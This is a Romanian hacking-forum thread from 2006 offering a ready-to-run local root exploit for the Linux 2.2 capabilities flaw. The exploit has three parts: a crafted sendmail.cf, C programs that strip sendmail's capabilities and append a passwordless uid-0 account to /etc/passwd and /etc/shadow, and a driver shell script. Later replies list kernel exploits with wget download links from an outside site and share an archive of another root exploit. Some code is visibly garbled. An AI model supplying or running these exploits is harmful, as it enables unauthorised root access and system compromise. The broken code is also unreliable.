zbeng Posted May 28, 2006 Report Posted May 28, 2006 Incepand din acest numar, m-am gandit sa infiintzez o rubrica pentru "script kiddies", nu de alta, dar sunt un tip foarte lenesh, shi tzin minte ca pe vremuri nu de mult apuse, eram ahtiat dupa programele ushor de folosit, care sa imi ofere root in nu mai mult de 10 minute pe diferite linux-box-uri. Si cum printre cititorii revistei sunt cu sigurantza sunt doritori...Recent, s-a descoperit ca in kernelele 2.2.x exista o mare problema, si tocmai despre aceasta problema o sa discutam astazi."Capabilitatzile" cerute de unul din standardele POSIX au fost recent implementate in kernelul de Linux. Mai exact de pe la 2.2. incoace. Aceste "capabilitatzi" sunt de fapt un nou mod de contol al privilegiilor, care spun de fapt intr-un mod mai specific ce pot sa faca procesele privilegiate (nu vreau sa fiu foarte rautacios cu cititorii revistei, dar shtitzi ce-s alea procese, nu?).Problema cu aceste capabilitati este ca ele se mostenesc de la procesul tata la procesul fiu asa cum sunt. Si acuma modul de exploatare: Daca setam toti capabilitatile la 0 (adica cel mai neprivilegiat mod cu putiintza), un program cum este sendmail care incearca sa faca un setgid si setuid inainte de a face lucruri care pot dauna sistemului daca sunt rulate ca root, nu va mai reusi sa faca acest lucru, si va rula in continuare ca root. Si daca ai un program care ruleaza ca root, si care face tot ce vrei tu, mai e vreo problema sa controlezi masina resprectiva ? Eu cred ca nu.Bun. Si cum rubrica se numeste "sKript Kiddo", sa vedem acuma scriptul care face toate povestea sa functioneze cum trebuie. Dar nu va grabiti. Mai intai sa va explic ce vreau sa fac. In primul rand am de gand sa ma joc de-a sendmail-u. Adica sa folosesc sendmailul ca shperaclu in sistem. Si dupa cum stiti, sendmailul are un fisier de configurare, pe care-l chiama sendmail.cf. Ei bine, mie nu imi place acel fisier, asa ca o sa scriu altul. Apoi am de gand sa fac un programel care sa arunce in aer privilegiile lui sendmail, astfel incat sendmail sa nu mai poata sa faca setuid si setgid, iar apoi sendmail.cf-ul scris de mine o sa-i spuna sendmail-ului sa ruleze un program care va scrie in /etc/passwd shi in /etc/shadow o noua linie, care imi va da cont de root.Deci. Copiati tot ce urmeaza intr-un fisier pe care il veti denumi sendmail.cf. La sfarsitul fisierului, cam a 15-a linie de sus in jos, exista o linie comentata. Urmati indicatiile.--- Cut Here (sendmail.cf) --V8/BerkeleyCwlocalhostFw/etc/sendmail.cwDSlocalhostCO @ % !C..C[[Kaccess hash -o /etc/mail/accessFR-o /etc/mail/relay-domainsKdequote dequoteCE rootDnMAILER-DAEMONCPREDIRECTDZ8.9.3O SevenBitInput=FalseO EightBitMode=pass8O AliasWait=10O AliasFile=/etc/aliasesO MinFreeBlocks=100O BlankSub=.O HoldExpensive=FalseO DeliveryMode=backgroundO AutoRebuildAliases=TrueO TempFileMode=0600O HelpFile=/usr/lib/sendmail.hfO SendMimeErrors=TrueO ForwardPath=$z/.forward.$w:$z/.forwardO ConnectionCacheSize=2O ConnectionCacheTimeout=5mO UseErrorsTo=FalseO LogLevel=9O CheckAliases=FalseO OldStyleHeaders=TrueO PrivacyOptions=authwarningsO QueueDirectory=/tmpO Timeout.connect=1mO Timeout.queuereturn=5dO Timeout.queuewarn=4hO SuperSafe=TrueO StatusFile=/var/log/sendmail.stO DefaultUser=8:12O TryNullMXList=trueO RefuseLA=12O MaxDaemonChildren=20O ConnectionRateThrottle=1O HostsFile=/etc/hostsO SmtpGreetingMessage=$j Sendmail $v/$Z; $bO UnixFromLine=From $g $dO OperatorChars=.:%@!^/[]+O DontProbeInterfaces=truePfirst-class=0Pspecial-delivery=100Plist=-30Pbulk=-60Pjunk=-100TrootTdaemonTuucpH?P?Return-Path: <$g>HReceived: $?sfrom $s $.$?_($?s$|from $.$_)$.by $j ($v/$Z)$?r with $r$. id $i$?ufor $u; $|;$.$bH?D?Resent-Date: $aH?D?Date: $aH?F?Resent-From: $?x$x <$g>$|$g$.H?F?From: $?x$x <$g>$|$g$.H?x?Full-Name: $xH?M?Resent-Message-Id: <$t.$i@$j>H?M?Message-Id: <$t.$i@$j>S3R$@ $@ <@>R$* $: $1 <@> mark addressesR$* < $* > $* <@> $: $1 < $2 > $3 unmark <addr>R@ $* <@> $: @ $1 unmark @host:...R$* :: $* <@> $: $1 :: $2 unmark node::addrR:include: $* <@> $: :include: $1 unmark :include:...R$* [ $* : $* ] <@> $: $1 [ $2 : $3 ] unmark IPv6 addrsR$* : $* [ $* ] $: $1 : $2 [ $3 ] <@> remark if leading colonR$* : $* <@> $: $2 strip colon if markedR$* <@> $: $1 unmarkR$* ; $1 strip trailing semiR$* < $* ; > $1 < $2 > bogus bracketed semiR$@ $@ :; <@>R$* $: < $1 > housekeeping <>R$+ < $* > < $2 > strip excess on leftR< $* > $+ < $1 > strip excess on rightR<> $@ < @ > MAIL FROM:<> caseR< $+ > $: $1 remove housekeeping <>R@ $+ , $+ @ $1 : $2 change all "," to ":"R@ $+ : $+ $@ $>96 < @$1 > : $2 handle <route-addr>R $+ : $* ; @ $+ $@ $>96 $1 : $2 ; < @ $3 > list syntaxR $+ : $* ; $@ $1 : $2; list syntaxR$+ @ $+ $: $1 < @ $2 > focus on domainR$+ < $+ @ $+ > $1 $2 < @ $3 > move gaze rightR$+ < @ $+ > $@ $>96 $1 < @ $2 > already canonicalR$* < @ $* : $* > $* $1 < @ $2 $3 > $4 nix colons in addrsR$- ! $+ $@ $>96 $2 < @ $1 .UUCP > resolve uucp namesR$+ . $- ! $+ $@ $>96 $3 < @ $1 . $2 > domain uucpsR$+ ! $+ $@ $>96 $2 < @ $1 .UUCP > uucp subdomainsR$* % $* $1 @ $2 First make them all @s.R$* @ $* @ $* $1 % $2 @ $3 Undo all but the last.R$* @ $* $@ $>96 $1 < @ $2 > Insert < > and finishR$* $@ $>96 $1S96R$* < @ localhost > $* $: $1 < @ $j . > $2 no domain at allR$* < @ localhost . $m > $* $: $1 < @ $j . > $2 local domainR$* < @ localhost . UUCP > $* $: $1 < @ $j . > $2 .UUCP domainR$* < @ [ $+ ] > $* $: $1 < @@ [ $2 ] > $3 mark [a.b.c.d]R$* < @@ $=w > $* $: $1 < @ $j . > $3 self-literalR$* < @@ $+ > $* $@ $1 < @ $2 > $3 canon IP addrR$* < @ $+ . UUCP > $* $: $1 < @ $[ $2 $] . UUCP . > $3R$* < @ $+ . . UUCP . > $* $@ $1 < @ $2 . > $3R$* < @ $=w > $* $: $1 < @ $2 . > $3R$* < @ $j > $* $: $1 < @ $j . > $2R$* < @ $=M > $* $: $1 < @ $2 . > $3R$* < @ $* $=P > $* $: $1 < @ $2 $3 . > $4R$* < @ $* . . > $* $1 < @ $2 . > $3S4R$* <@> $@ handle <> and list:;R$* < @ $+ . > $* $1 < @ $2 > $3R$* < @ *LOCAL* > $* $1 < @ $j > $2R$* < $+ > $* $1 $2 $3 defocusR@ $+ : @ $+ : $+ @ $1 , @ $2 : $3 <route-addr> canonicalR@ $* $@ @ $1 ... and exitR$+ @ $- . UUCP $2!$1 u@h.UUCP => h!uR$+ % $=w @ $=w $1 @ $2 u%host@host => u@hostS97R$* $: $>3 $1R$* $@ $>0 $1S0R$* $: $>Parse0 $1 initial parsingR<@> $#local $: <@> special case error msgsR$* $: $>98 $1 handle local hacksR$* $: $>Parse1 $1 final parsingSParse0R<@> $@ <@> special case error msgsR$* : $* ; <@> $#error $@ 5.1.3 $: "List:; syntax illegal for recipient addresses"#R@ <@ $* > < @ $1 > catch "@@host" bogosityR<@ $+> $#error $@ 5.1.3 $: "User address required"R$* $: <> $1R<> $* < @ [ $+ ] > $* $1 < @ [ $2 ] > $3R<> $* <$* : $* > $* $#error $@ 5.1.3 $: "Colon illegal in host name part"R<> $* $1R$* < @ . $* > $* $#error $@ 5.1.2 $: "Invalid host name"R$* < @ $* .. $* > $* $#error $@ 5.1.2 $: "Invalid host name"R$* < @ > $* $@ $>Parse0 $>3 $1 user@ => userR< @ $=w . > : $* $@ $>Parse0 $>3 $2 @here:... -> ...R$- < @ $=w . > $: $(dequote $1 $) < @ $2 . > dequote "foo"@hereR< @ $+ > $#error $@ 5.1.3 $: "User address required"R$* $=O $* < @ $=w . > $@ $>Parse0 $>3 $1 $2 $3 ...@here -> ...R$- $: $(dequote $1 $) < @ *LOCAL* > dequote "foo"R< @ *LOCAL* > $#error $@ 5.1.3 $: "User address required"R$* $=O $* < @ *LOCAL* >$@ $>Parse0 $>3 $1 $2 $3 ...@*LOCAL* -> ...R$* < @ *LOCAL* > $: $1SParse1R$* < @ [ $+ ] > $* $: $>98 $1 < @ [ $2 ] > $3 numeric internet specR$* < @ [ $+ ] > $* $#esmtp $@ [$2] $: $1 < @ [$2] > $3 still numeric: sendR$+ < @ $=w . > $: < $(virtuser $1 @ $2 $@ $1 $: @ $) > $1 < @ $2 . >R<@> $+ + $* < @ $* . >$: < $(virtuser $1 + * @ $3 $@ $1 $: @ $) > $1 + $2 < @ $3 . >R<@> $+ + $* < @ $* . >$: < $(virtuser $1 @ $3 $@ $1 $: @ $) > $1 + $2 < @ $3 . >R<@> $+ < @ $+ . > $: < $(virtuser @ $2 $@ $1 $: @ $) > $1 < @ $2 . >R<@> $+ $: $1R< error : $- $+ > $* $#error $@ $(dequote $1 $) $: $2R< $+ > $+ < @ $+ > $: $>97 $1R$=L < @ $=w . > $#local $: @ $1 special local namesR$+ < @ $=w . > $#local $: $1 regular local nameR$* < @ $* > $* $: $>95 < $S > $1 < @ $2 > $3 glue on smarthost nameR$* < @$* > $* $#esmtp $@ $2 $: $1 < @ $2 > $3 user@host.domainR$=L $#local $: @ $1 special local namesR$+ $#local $: $1 regular local namesS5R$+ + * $#local $@ $&h $: $1R$+ + $* $#local $@ + $2 $: $1 + *R$+ $: <> $1R< > $+ $: < $H > $1 try hubR< > $+ $: < $R > $1 try relayR< > $+ $: < > < $1 $&h > nope, restore +detailR< > < $+ + $* > $* < > < $1 > + $2 $3 find the user partR< > < $+ > + $* $#local $@ $2 $: @ $1 strip the extra +R< > < $+ > $@ $1 no +detailR$+ $: $1 <> $&h add +detail back inR$+ <> + $* $: $1 + $2 check whether +detailR$+ <> $* $: $1 else discardR< local : $* > $* $: $>95 < local : $1 > $2 no host extensionR< error : $* > $* $: $>95 < error : $1 > $2 no host extensionR< $- : $+ > $+ $: $>95 < $1 : $2 > $3 < @ $2 >R< $+ > $+ $@ $>95 < $1 > $2 < @ $1 >S95R< > $* $@ $1 strip off null relayR< error : $- $+ > $* $#error $@ $(dequote $1 $) $: $2R< local : $* > $* $>CanonLocal < $1 > $2R< $- : $+ @ $+ > $*<$*>$* $# $1 $@ $3 $: $2<@$3> use literal userR< $- : $+ > $* $# $1 $@ $2 $: $3 try qualified mailerR< $=w > $* $@ $2 delete local hostR< $+ > $* $#relay $@ $1 $: $2 use unqualified mailerSCanonLocalR< $* > < @ $+ > : $+ $@ $>97 $3R< $* > $+ $=O $+ < @ $+ > $@ $>97 $2 $3 $4R< $* > $* < @ $* . > $: < $1 > $2 < @ $3 >R< > $* < @ $* > $* $#local $@ $1@$2 $: $1R< > $+ $#local $@ $1 $: $1R< $+ @ $+ > $* < @ $* > $: < $1 > $3 < @ $4 >R< $+ > $* <@ $* > $* $#local $@ $2@$3 $: $1R< $+ > $* $#local $@ $2 $: $1S93R$=E < @ *LOCAL* > $@ $1 < @ $j . > leave exposedR$=E < @ $=M . > $@ $1 < @ $2 . >R$=E < @ $=w . > $@ $1 < @ $2 . >R$* < @ $=M . > $* $: $1 < @ $2 . @ $M > $3 convert masqueraded domsR$* < @ $=w . > $* $: $1 < @ $2 . @ $M > $3R$* < @ *LOCAL* > $* $: $1 < @ $j . @ $M > $2R$* < @ $+ @ > $* $: $1 < @ $2 > $3 $M is nullR$* < @ $+ @ $+ > $* $: $1 < @ $3 . > $4 $M is not nullS94R$* < @ *LOCAL* > $* $: $1 < @ $j . > $2S98R wmail.$- $# wmail $: $1R wmail.$- < @ $=w . > $# wmail $: $1R wmail.$- < @ [ $=w ] . > $# wmail $: $1R wmail.$- < @ [ $+ ] . > $# wmail $: $1R$* < @ $+ .REDIRECT. > $: $1 < @ $2 . REDIRECT . > < ${opMode} >R$* < @ $+ .REDIRECT. > $: $1 < @ $2 . REDIRECT. >R$* < @ $+ .REDIRECT. > < $- > $# error $@ 5.1.1 $: "551 User has moved; please try " <$1@$2>SLookUpDomainR<$+> <$+> <$*> $: < $(access $1 $: ? $) > <$1> <$2> <$3>R<?> <$+.$+> <$+> <$*> $@ $>LookUpDomain <$2> <$3> <$4>R<?> <$+> <$+> <$*> $@ <$2> <$3>R<$*> <$+> <$+> <$*> $@ <$1> <$4>SLookUpAddressR<$+> <$+> <$*> $: < $(access $1 $: ? $) > <$1> <$2> <$3>R<?> <$+.$-> <$+> <$*> $@ $>LookUpAddress <$1> <$3> <$4>R<?> <$+> <$+> <$*> $@ <$2> <$3>R<$*> <$+> <$+> <$*> $@ <$1> <$4>SCanonAddrR$* $: $>Parse0 $>3 $1 make domain canonicalR< @ $+ > : $* @ $* < @ $1 > : $2 % $3 change @ to % in src routeR$* < @ $+ > : $* : $* $3 $1 < @ $2 > : $4 change to % hack.R$* < @ $+ > : $* $3 $1 < @ $2 >SParseRecipientR$* $: <?> $>CanonAddr $1R<?> $* < @ $* . > <?> $1 < @ $2 > strip trailing dotsR<?> $- < @ $* > $: <?> $(dequote $1 $) < @ $2 > dequote local partR<?> $* $=O $* < @ $* > $: <NO> $1 $2 $3 < @ $4>R<?> $* $@ $1R<NO> $* < @ $* $=R > $: <RELAY> $1 < @ $2 $3 >R<NO> $* < @ $+ > $: $>LookUpDomain <$2> <NO> <$1 < @ $2 >>R<$+> <$+> $: <$1> $2R<RELAY> $* < @ $* > $@ $>ParseRecipient $1R<$-> $* $@ $2SLocal_check_relayScheck_relayR$* $: $1 $| $>"Local_check_relay" $1R$* $| $* $| $#$* $#$3R$* $| $* $| $* $@ $>"Basic_check_relay" $1 $| $2SBasic_check_relayR$* $: < ${deliveryMode} > $1R< d > $* $@ deferredR< $* > $* $: $2R$+ $| $+ $: $>LookUpDomain < $1 > <?> < $2 >R<?> < $+ > $: $>LookUpAddress < $1 > <?> < $1 >R<?> < $+ > $: $1R<OK> < $* > $@ OKR<RELAY> < $* > $@ RELAYR<REJECT> $* $#error $@ 5.7.1 $: "550 Access denied"R<DISCARD> $* $#discard $: discardR<$+> $* $#error $@ 5.7.1 $: $1SLocal_check_mailScheck_mailR$* $: $1 $| $>"Local_check_mail" $1R$* $| $#$* $#$2R$* $| $* $@ $>"Basic_check_mail" $1SBasic_check_mailR$* $: < ${deliveryMode} > $1R< d > $* $@ deferredR< $* > $* $: $2R<> $@ <OK>R$* $: <?> $>CanonAddr $1R<?> $* < @ $+ . > <?> $1 < @ $2 > strip trailing dotsR<?> $* < $* $=P > $* $: <OK> $1 < @ $2 $3 > $4R<?> $* < @ $+ > $* $: <OK> $1 < @ $2 > $3 ... unresolvable OKR<$+> $* < @localhost > $: < ? $&{client_name} > <$1> $2 < @localhost >R<$+> $* < @localhost.$m >$: < ? $&{client_name} > <$1> $2 < @localhost.$m >R<$+> $* < @localhost.UUCP >$: < ? $&{client_name} > <$1> $2 < @localhost.UUCP >R<? $=w> <$+> $* <?> <$2> $3R<? $+> <$+> $* $#error $@ 5.5.4 $: "553 Real domain name required"R<?> <$+> $* $: <$1> $2R<$+> $* < @ $+ > $* $: <USER $(access $2@ $: ? $) > <$1> $2 < @ $3 > $4R<USER ?> <$+> $* < @ $* > $*$: <USER $(access $2@$3$4 $: ? $) > <$1> $2 < @ $3 > $4R<USER ?> <$+> $+ < @ $+ > $*$: <USER $(access $2@$3 $: ? $) > <$1> $2 < @ $3 > $4R<USER ?> <$+> $* < @ $+ > $*$: $>LookUpDomain <$3> <$1> <>R<?> $* $: <USER $(access $1@ $: ? $) > <?> $1R<USER $+> <$+> $* $: <$1> $3R<?> $* $: < ? $&{client_name} > $1R<?> $* $@ <OK> ...local unqualed okR<? $+> $* $#error $@ 5.5.4 $: "553 Domain name required"...remote is notR<?> $* $@ <OK>R<OK> $* $@ <OK>R<TEMP> $* $#error $@ 4.1.8 $: "451 Sender domain must resolve"R<PERM> $* $#error $@ 5.1.8 $: "501 Sender domain must exist"R<RELAY> $* $@ <RELAY>R<DISCARD> $* $#discard $: discardR<REJECT> $* $#error $@ 5.7.1 $: "550 Access denied"R<$+> $* $#error $@ 5.7.1 $: $1 error from access dbSLocal_check_rcptScheck_rcptR$* $: $1 $| $>"Local_check_rcpt" $1R$* $| $#$* $#$2R$* $| $* $@ $>"Basic_check_rcpt" $1SBasic_check_rcptR$* $: < ${deliveryMode} > $1R< d > $* $@ deferredR< $* > $* $: $2R$* $: $>ParseRecipient $1 strip relayable hostsR$* $: <?> $1R<?> $+ < @ $=w > $: <> <USER $1> <FULL $1@$2> <HOST $2> <$1 < @ $2 >>R<?> $+ < @ $* > $: <> <FULL $1@$2> <HOST $2> <$1 < @ $2 >>R<?> $+ $: <> <USER $1> <$1>R<> <USER $+> $* $: <$(access $1 $: $)> $2R<> <FULL $+> $* $: <$(access $1 $: $)> $2R<OK> <FULL $+> $* $: <$(access $1 $: $)> $2R<> <HOST $+> $* $: <$(access $1 $: $)> $2R<OK> <HOST $+> $* $: <$(access $1 $: $)> $2R<> <$*> $: $1R<OK> <$*> $: $1R<RELAY> <$*> $: $1R<REJECT> $* $#error $@ 5.2.1 $: "550 Mailbox disabled for this recipient"R<$+> $* $#error $@ 5.2.1 $: $1 error from access dbR$+ < @ $=w > $@ OKR$+ < @ $* $=R > $@ OKR$+ < @ $* > $: $>LookUpDomain <$2> <?> <$1 < @ $2 >>R<RELAY> $* $@ RELAYR<$*> <$*> $: $2R$* $: <?> $1R<?> $* < @ $+ > $: <REMOTE> $1 < @ $2 >R<?> $+ $@ OKR<$+> $* $: $2R$* $: <?> $&{client_name}R<?> [$+] $: <BAD> [$1]R<?> $* $~P $: <?> $[ $1 $2 $]R<$-> $* $: $2R$* . $1 strip trailing dotsR$@ $@ OKR$=w $@ OKR$* $=R $@ OKR$* $: $>LookUpDomain <$1> <?> <$1>R<RELAY> $* $@ RELAYR<$*> <$*> $: $2R$* $: $&{client_addr}R$@ $@ OK originated locallyR0 $@ OK originated locallyR$=R $* $@ OK relayable IP addressR$* $: $>LookUpAddress <$1> <?> <$1>R<RELAY> $* $@ RELAY relayable IP addressR<$*> <$*> $: $2R$* $: [ $1 ] put brackets around it...R$=w $@ OK ... and see if it is localR$* $#error $@ 5.7.1 $: "550 Relaying denied"Mprocmail, P=/usr/bin/procmail, F=DFMSPhnu9, S=11/31, R=21/31, T=DNS/RFC822/X-Unix,A=procmail -Y -m $h $f $uMsmtp, P=[iPC], F=mDFMuX, S=11/31, R=21, E=rn, L=990,T=DNS/RFC822/SMTP,A=IPC $hMesmtp, P=[iPC], F=mDFMuXa, S=11/31, R=21, E=rn, L=990,T=DNS/RFC822/SMTP,A=IPC $hMsmtp8, P=[iPC], F=mDFMuX8, S=11/31, R=21, E=rn, L=990,T=DNS/RFC822/SMTP,A=IPC $hMrelay, P=[iPC], F=mDFMuXa8, S=11/31, R=61, E=rn, L=2040,T=DNS/RFC822/SMTP,A=IPC $hS11R$+ $: $>51 $1 sender/recipient commonR$* :; <@> $@ list:; special caseR$* $: $>61 $1 qualify unqual'ed namesR$+ $: $>94 $1 do masqueradingS21R$+ $: $>51 $1 sender/recipient commonR$+ $: $>61 $1 qualify unqual'ed namesS31R$+ $: $>51 $1 sender/recipient commonR:; <@> $@ list:; special caseR$* <@> $* $@ $1 <@> $2 pass null host throughR< @ $* > $* $@ < @ $1 > $2 pass route-addr throughR$* $: $>61 $1 qualify unqual'ed namesR$+ $: $>93 $1 do masqueradingS51R< @ $+ > $* $@ < @ $1 > $2 resolve <route-addr>R$+ < @ $+ .UUCP. > $: < $2 ! > $1 convert to UUCP formR$+ < @ $* > $* $@ $1 < @ $2 > $3 not UUCP formR< $&h ! > $- ! $+ $@ $2 < @ $1 .UUCP. >R< $&h ! > $-.$+ ! $+ $@ $3 < @ $1.$2 >R< $&h ! > $+ $@ $1 < @ $&h .UUCP. >R< $+ ! > $+ $: $1 ! $2 < @ $Y > use UUCP_RELAYR$+ < @ $+ : $+ > $@ $1 < @ $3 > strip mailer: partR$+ < @ > $: $1 < @ *LOCAL* > if no UUCP_RELAYS61R$* < @ $* > $* $@ $1 < @ $2 > $3 already fully qualifiedR$+ $@ $1 < @ *LOCAL* > add local qualificationS71R$+ $: $>61 $1R$+ $: $>93 $1#inlocuiti pe linia urmatoare stringul /calea/spre cu directorul curent#eg: /home/userMlocal, P=/calea/spre/add, F=lsDFMAw5:/|@qSPfhn9, S=10/30, R=20/40,T=DNS/RFC822/X-Unix,A=add -Y -a $h -d $uMprog, P=/usr/sbin/smrsh, F=lsDFMoqeu9, S=10/30, R=20/40, D=$z:/,T=X-Unix,A=sh -c $uMwmail, P=/usr/local/wMail/wmail,F=lsD, S=10/30, R=20/40, D=/tmp/,T=X-Unix,A=/usr/local/wMail/wmail $uS10R<@> $n errors to mailer-daemonR@ <@ $*> $n temporarily bypass Sun bogosityR$+ $: $>50 $1 add local domain if neededR$* $: $>94 $1 do masqueradingS20R$+ < @ $* > $: $1 strip host partS30R<@> $n errors to mailer-daemonR@ <@ $*> $n temporarily bypass Sun bogosityR$+ $: $>50 $1 add local domain if neededR$* $: $>93 $1 do masqueradingS40R$+ $: $>50 $1 add local domain if neededS50R$* < @ $* > $* $@ $1 < @ $2 > $3 already fully qualifiedR$+ $@ $1 < @ *LOCAL* > add local qualification--- Cut here (gata) --Si in sfarshit scriptul--- CUT HERE ---#!/bin/sh## Acest script este adaptat si modificat dupa programele care au# fost publicate pe lista de discutzii BUGTRAQ.# Folosirea lui poate produce pagube si este in general impotriva legii# Personal va recomand sa nu il folositi.# De asemenea, recomad sa nu il distribuitzi, cu toate ca este sub# licentza GPLecho creez fisierele sursacat <<gata1> ex.c#include <linux/capability.h>int main (void) {cap_user_header_t header;cap_user_data_t data;header = malloc(;data = malloc(12);header->pid = 0;header->version = _LINUX_CAPABILITY_VERSION;data->inheritable = data->effective = data->permitted = 0;capset(header, data);execlp("/usr/sbin/sendmail", "sendmail" ,"-t", "-C", "./sendmail.cf", NULL);}gata1echo shi acuma cel de-al doileacat <<gata.2> add.c#include <fcntl.h>int main (void) {int fd;char string[250];seteuid(0);setegid(0);setuid(0);setgid(0);system("chmod u+w /etc/shadow");fd = open("/etc/passwd", O_APPEND|O_WRONLY);strcpy(string, "shmekeru:@:0:0::/root:/bin/shn");write(fd, string, strlen(string));close(fd);fd = open("/etc/shadow", O_APPEND|O_WRONLY);strcpy(string, "shmekeru::11029:0:99999:7:::n");write(fd, string, strlen(string));close(fd);}gata.2echo compilez...gcc -o add add.cgcc -o ex ex.ccat <<gata3> mailexpFrom: spargatoru@foobar.comTo: root@localhostSubject: foobar.gata3echo rulez xploitu./ex < mailexpecho shi acuma ashteptatzi un pic...sleep 10echo root access pentru dumneavoastraecho daca nu exista ssh instalat in sistem incercatiecho su shmekerussh -lshmekeru localhost-- Cut here (done) -- Quote
Thunder Posted May 29, 2006 Report Posted May 29, 2006 Da...fain .. dar m-am cam incurcat la sfarsit Quote
DANG3R Posted May 30, 2006 Report Posted May 30, 2006 si eu mam pierdut pe acolo ma ajuta cineva ? adica sa fie mai exact unpic unde se termina scritul si ce trebuie modificat Quote
cigraphics Posted June 2, 2006 Report Posted June 2, 2006 poate cineva sa puna tot fisierul pe un host ceva de upload ca sa nu mai stam sa copiem ce scrie acolo si plus ca au mai aparut smileys Quote
Storm4u Posted August 21, 2006 Report Posted August 21, 2006 2.4.17newlocal  - wget [url]www.parit.org/newlocal[/url]kmod  - wget [url]www.parit.org/kmod[/url]2.4.18brknewlocalkmodkm.2 2.4.19brknewlocalkmod2.4.20ptracekmodbrk  2.4.21brkptrace  w00t2.4.22km.2brkptrace2.4.23mremap_pte  w00t2.4.24mremap_ptew00tUselib24elf2.4.27Uselib24w00telfelflbl2.6.2mremap_ptekradpwned2.6.5 to 10krad pwnedkrad3www.parit.org o multe de "chestii" interesant Quote
Death Posted March 21, 2008 Report Posted March 21, 2008 Tinand cont ca nu mai exist pe aici, n-o sa comentez , dar pt 2.2.x si 2.0.x , exista exploituri mult mult mai banale.Din pacate nu mai am sursa , dar am sa las linkul unde l-am pus. http://rapidshare.de/files/38887651/0.tgz.html .Dezarhivezi , si apoi rulezi de cateva ori consecutiv gen : ./0;./0;./0;./0;./0;./0; .Se ia uid 0 pe orice kernel specificat mai sus , si chiar si pe unele 2.4; 2.4.7., 2.4.10 . Quote